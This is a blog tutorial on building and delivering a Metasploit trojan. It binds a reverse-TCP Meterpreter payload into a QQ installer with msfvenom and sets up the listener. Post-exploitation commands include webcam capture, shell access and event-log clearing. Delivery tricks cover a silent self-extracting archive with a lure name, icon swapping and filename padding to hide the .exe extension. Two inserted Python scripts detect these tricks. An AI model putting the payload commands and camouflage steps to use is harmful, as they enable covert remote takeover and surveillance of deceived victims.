msf Trojan Horse Program

Bundled Trojan

The Kali Linux virtual machine is used here. The attacker IP is 192.168.0.108 and the target IP is 192.168.177.134.

Generate Trojan file

First upload a normal installation package to Kali.

I downloaded a QQ installer and uploaded it to /root/dy/.

Then start bundling

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe

-p: specifies the payload that follows.

windows/meterpreter/reverse_tcp: a Meterpreter payload for Windows that connects back to the attacker over TCP.

LHOST=192.168.0.108: the IP the payload connects back to, i.e. your Kali address.

LPORT can also be set; it is not set here, so the default port 4444 is used.

-f: the output file format, here an exe.

-x: the path and name of the legitimate file to bundle the payload into; here PCQQ2020.exe in /root/dy/.

-o: the path and name of the generated Trojan file; here it is saved in the same directory under the name QQ.exe.

Generated.

Attachment: introduction to msfvenom

msfvenom combines msfpayload and msfencode. It generates a Trojan program which, once executed on the target machine, connects back to a Meterpreter listener started locally.
Important msfvenom parameters (use msfvenom -h to view all of them):

-p payload to use
-e encoder to use
-a target architecture, default x86
-s maximum payload size
-i number of encoding iterations
-f output file format
msfvenom generation

To generate a payload, two options are required: -p and -f.
Use -p to specify the payload to be used.

./msfvenom -l payloads      // list all payloads available in msf

Use -f to specify the output format of the payload.

./msfvenom -p windows/meterpreter/bind_tcp -f exe
./msfvenom --help-formats      // list the output formats msf supports

A typical msfvenom invocation looks like this:

$ ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Attacker IP] LPORT=4444 -f exe -o /tmp/my_payload.exe
Introduction to the exploit/multi/handler module
msf > use exploit/multi/handler
# use exploit/multi/handler to listen for the incoming backdoor connection
msf exploit(handler) > set payload windows/meterpreter/reverse_http
# set the payload matching the one that was generated
msf exploit(handler) > show options
# show all settings; if necessary, set LHOST and LPORT to the same address and port used in the payload

Set up the listener for the reverse connection

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 4444
run


Send Trojan

Next, send the Trojan file to the target. Getting the target to trust you and install the file you sent depends on your social engineering skills.
As a young man who complies with the Network Security Law of the People's Republic of China, I naturally chose to send the Trojan file to another Windows virtual machine.

First copy the Trojan file to the physical machine, then upload it from the physical machine to the virtual machine.

Then double-click to run QQ; Kali receives the connection and a session to the target machine is opened.

Check the target's IP
ipconfig

View the target's directory
dir

Screenshot
screenshot

A screenshot of the compromised host is captured and the path it was saved to is printed.

Turn on the camera

This failed because the virtual machine has no camera attached.

Attachment: commonly used Meterpreter commands
info                    # show information about a loaded module
getuid                  # show the user the session is running as
getpid                  # get the PID of the current process
sysinfo                 # show target system information
ps                      # list running processes
kill <PID>              # kill a process
reboot / shutdown       # reboot / shut down the target
shell                   # drop into a cmd shell on the target
webcam_list             # list webcams
webcam_snap             # take a photo with the webcam
webcam_stream           # stream video from the webcam
execute                 # run a file on the target
execute -H -i -f cmd.exe  # start a new cmd.exe process; -H hidden, -i interactive
migrate <pid>           # migrate the Meterpreter session into the process with that PID
clearev                 # clear the Windows application, system and security event logs
enumdesktops            # list available desktops
getdesktop              # show the desktop the current Meterpreter session is attached to
set_desktop             # set the desktop Meterpreter is attached to; -h for help
screenshot              # take a screenshot
use espia               # or load the espia extension and then run screengrab
run vnc                 # open a VNC remote desktop session

Further access

shell

Running shell drops you into a cmd shell on the target host: the target host is yours.

What if the target simply does not download and install the file you sent?
RAR has a self-extracting (SFX) function, which can be used to achieve the same goal.
Take two files, the Trojan file generated above and a txt file, select both, right-click and choose "Add to archive". Note that the archive format must be RAR.

On the General tab:

The file name can be tempting, such as "school girl contact information.txt", where txt is not the file type but part of the file name; the file type is still exe.
Set the archive format to RAR and tick the option to create a self-extracting (SFX) archive.

On the Advanced tab there is an "SFX options" button; open it.
General: fill in any extraction path; here it is the root of the C: drive.

Setup: run the txt file before extraction and run QQ.exe after extraction.

Modes: hide all information during extraction.

Then confirm each dialog.

The result is a file called "school girl contact information"; send this file.

Also set up the monitor bounce, the same as the first part

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 4444
run

When this document is opened, the contents of the txt file are displayed, but QQ.exe is also executed silently.
Of course, in a real scenario you would switch to a lighter carrier file; anyone who sees a txt file of more than 80 MB will become suspicious.
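The SFX archive built above is driven by a script that WinRAR stores in the archive comment: a "run before extraction" entry (Presetup), a "run after extraction" entry (Setup) and "hide all" (Silent=1). Those directives are exactly what a defender should look for when triaging a self-extracting file. The following Python script is an added example written for this page, not the post's own code; SAMPLE_SFX is a constructed byte blob (an MZ/PE stand-in for the SFX stub, a RAR5 signature, then the script text), and the directive names are the documented WinRAR SFX commands.

```python
"""Static triage of a self-extracting RAR archive configured the way the
walk-through above describes. Added example for this page, not the post's
own code. SAMPLE_SFX is constructed: an MZ/PE stub stands in for the WinRAR
SFX module, followed by a RAR5 signature and an archive comment holding the
SFX script in plain text. A real archive has real headers in between; the
heuristic only relies on the signature and the directive text.
"""
import re
from typing import Dict, List, Optional

RAR4_SIG = b"Rar!\x1a\x07\x00"
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"

# SFX script directives WinRAR stores in the archive comment. The walk-through
# sets three of them: Presetup (run before extraction), Setup (run after
# extraction) and Silent=1 (hide all extraction dialogs).
DIRECTIVE_RE = re.compile(
    rb"\b(Path|Setup|Presetup|Silent|Overwrite|TempMode|Title)=([^\r\n]*)",
    re.IGNORECASE,
)

# Constructed sample: stub, RAR5 signature, padding, then the SFX script.
SAMPLE_SFX = (
    b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 200
    + RAR5_SIG + b"\x00" * 16
    + b"Path=C:\\\r\nPresetup=contact.txt\r\nSetup=QQ.exe\r\nSilent=1\r\nOverwrite=1\r\n"
    + b"\x00" * 32
)

AUTO_RUN_EXTS = (".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".ps1")


def find_rar_signature(data: bytes) -> Optional[int]:
    """Offset of the embedded RAR archive, or None if no RAR signature is present."""
    for sig in (RAR5_SIG, RAR4_SIG):
        off = data.find(sig)
        if off != -1:
            return off
    return None


def is_sfx(data: bytes) -> bool:
    """A RAR SFX is a PE stub (MZ at offset 0) with a RAR archive appended after it."""
    off = find_rar_signature(data)
    return data[:2] == b"MZ" and off is not None and off > 0


def extract_sfx_script(data: bytes) -> Dict[str, str]:
    """Collect Key=Value directives found after the RAR signature, keys lower-cased."""
    off = find_rar_signature(data)
    if off is None:
        return {}
    return {
        m.group(1).decode().lower(): m.group(2).decode(errors="replace").strip()
        for m in DIRECTIVE_RE.finditer(data[off:])
    }


def assess_sfx(data: bytes) -> List[str]:
    """Reasons the archive behaves like a dropper rather than a plain installer."""
    if not is_sfx(data):
        return []
    script = extract_sfx_script(data)
    reasons = []
    if script.get("silent") == "1":
        reasons.append("Silent=1: the extraction dialog is hidden from the user")
    for key in ("presetup", "setup"):
        target = script.get(key, "")
        if target.lower().endswith(AUTO_RUN_EXTS):
            reasons.append(f"{key}={target}: an executable is launched automatically")
    if "presetup" in script and "setup" in script:
        reasons.append("a decoy runs before extraction while a second program runs after it")
    return reasons


if __name__ == "__main__":
    print(extract_sfx_script(SAMPLE_SFX))
    for reason in assess_sfx(SAMPLE_SFX):
        print("-", reason)
```

The byte scan assumes the comment is stored as plain text, which is not guaranteed for every archive version (older RAR formats can store the comment compressed). For a real sample, confirm by opening the archive comment with WinRAR or an unrar utility; the combination of Silent=1 with a Setup entry pointing at an executable is the signal either way.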

Camouflage

How can the file be made to look more convincing? QQ.exe is used as the example here.

Two tools are introduced.

BeCyIconGrabber can extract icons from files. Here the icon of a Word document is extracted.

Resource Hacker can modify a file's icon; it is used to replace the executable's icon with the Word document icon.

This is the difference between the file before and after the icon change.
Because the executable requires administrator privileges to run, it carries an additional UAC shield overlay. Using a different carrier file avoids this.

Of course, because Windows hides known file extensions by default, and non-expert users rarely change that setting, the target usually cannot see the extension, as shown below.

But what if the target has extensions displayed?

There is still a way to disguise it: make the file name long enough that Windows displays only the first part and hides the rest of the name, as follows.
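The three disguises in this section (a document icon on an executable, a document-style token such as ".txt" inside the name, and a name padded until the real extension scrolls out of view) all leave traces that can be checked mechanically: the extension the OS actually uses, the extension-like tokens before it, the name length, and the file's leading bytes, which no icon change touches. The following Python script is an added example written for this page, not the post's own code; the visible-column width, the sample names and the small magic-byte table are constructed assumptions.

```python
"""Name-level checks for the camouflage tricks described above: a document
icon on an executable, a document-style inner extension in front of the
real .exe, and a name padded until Explorer truncates the real extension.
Added example for this page, not the post's own code. The display width,
the sample names and the magic-byte table are constructed assumptions.
"""
import os
from typing import List

DOCUMENT_EXTS = {".txt", ".doc", ".docx", ".xls", ".xlsx", ".pdf", ".jpg", ".png"}
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".msi"}

# Leading bytes of a few container formats, mapped to what the file really is.
MAGIC = {
    b"MZ": "pe-executable",
    b"%PDF": "pdf",
    b"PK\x03\x04": "zip-or-office-xml",
    b"\xd0\xcf\x11\xe0": "ole-office",
}

# Assumed number of characters a file-list column shows before truncating.
VISIBLE_CHARS = 40


def real_extension(name: str) -> str:
    """The extension the OS actually uses: everything after the last dot."""
    return os.path.splitext(name)[1].lower()


def inner_extensions(name: str) -> List[str]:
    """Extension-like tokens that precede the real one, e.g. ['.txt'] for 'x.txt.exe'.

    Trailing spaces are stripped at each step so that padding between a decoy
    extension and the real one does not hide the decoy.
    """
    stem = os.path.splitext(name)[0]
    found = []
    while True:
        stem, ext = os.path.splitext(stem.rstrip())
        if not ext:
            return found
        found.append(ext.lower())


def content_type(header: bytes) -> str:
    """Classify the file by its first bytes, independent of name or icon."""
    for magic, kind in MAGIC.items():
        if header.startswith(magic):
            return kind
    return "unknown"


def assess_filename(name: str, header: bytes) -> List[str]:
    """Reasons the name/content combination is deceptive (empty if none)."""
    reasons = []
    ext = real_extension(name)
    inner = inner_extensions(name)
    kind = content_type(header)
    decoy = next((e for e in inner if e in DOCUMENT_EXTS), None)
    if ext in EXECUTABLE_EXTS and decoy is not None:
        reasons.append(f"document-style token {decoy} precedes executable extension {ext}")
    if ext in EXECUTABLE_EXTS and len(name) > VISIBLE_CHARS:
        reasons.append("name is longer than the visible column, so the extension is cut off")
    if kind == "pe-executable" and ext not in EXECUTABLE_EXTS:
        reasons.append(f"content is a PE executable but the name claims {ext or 'no extension'}")
    if "   " in name.strip():
        reasons.append("runs of spaces inside the name are typical padding")
    return reasons


if __name__ == "__main__":
    padded = "school girl contact information.docx" + " " * 50 + ".exe"
    for reason in assess_filename(padded, b"MZ\x90\x00"):
        print("-", reason)
```

The magic-byte check is the one that survives every trick on this page: Resource Hacker changes the icon resource, and the name can hide or pad the extension, but a PE file still begins with MZ. Mail gateways and endpoint tools that classify by content rather than by name or icon are applying the same idea.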


Origin blog.csdn.net/weixin_45663905/article/details/108568865